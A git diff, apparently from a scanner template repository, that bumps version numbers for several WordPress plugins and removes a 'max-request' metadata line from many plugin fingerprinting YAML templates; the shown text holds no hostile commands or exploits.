http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 206 files changed, 6 insertions(+), 206 deletions(-) diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt index 4be2c727ad..3d5762e858 100644 --- a/helpers/wordpress/plugins/complianz-gdpr.txt +++ b/helpers/wordpress/plugins/complianz-gdpr.txt @@ -1 +1 @@ -6.5.0 \ No newline at end of file +6.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/disable-gutenberg.txt b/helpers/wordpress/plugins/disable-gutenberg.txt index 0a35d8c853..f398a20612 100644 --- a/helpers/wordpress/plugins/disable-gutenberg.txt +++ b/helpers/wordpress/plugins/disable-gutenberg.txt @@ -1 +1 @@ -2.9 \ No newline at end of file +3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index a6c4b4a24a..e393c3c556 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.4.10 \ No newline at end of file +2.4.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-migrate-db.txt b/helpers/wordpress/plugins/wp-migrate-db.txt index ba5c9fca65..4484c2b27f 100644 --- a/helpers/wordpress/plugins/wp-migrate-db.txt +++ b/helpers/wordpress/plugins/wp-migrate-db.txt @@ -1 +1 @@ -2.6.7 \ No newline at end of file +2.6.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 91f3b43844..bcd250ed08 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.11.0 \ No newline at end of file +4.12.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpcf7-redirect.txt b/helpers/wordpress/plugins/wpcf7-redirect.txt index f3ac133c54..391e98560b 100644 --- a/helpers/wordpress/plugins/wpcf7-redirect.txt +++ b/helpers/wordpress/plugins/wpcf7-redirect.txt @@ -1 +1 @@ -2.9.0 \ No newline at end of file +2.9.2 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon 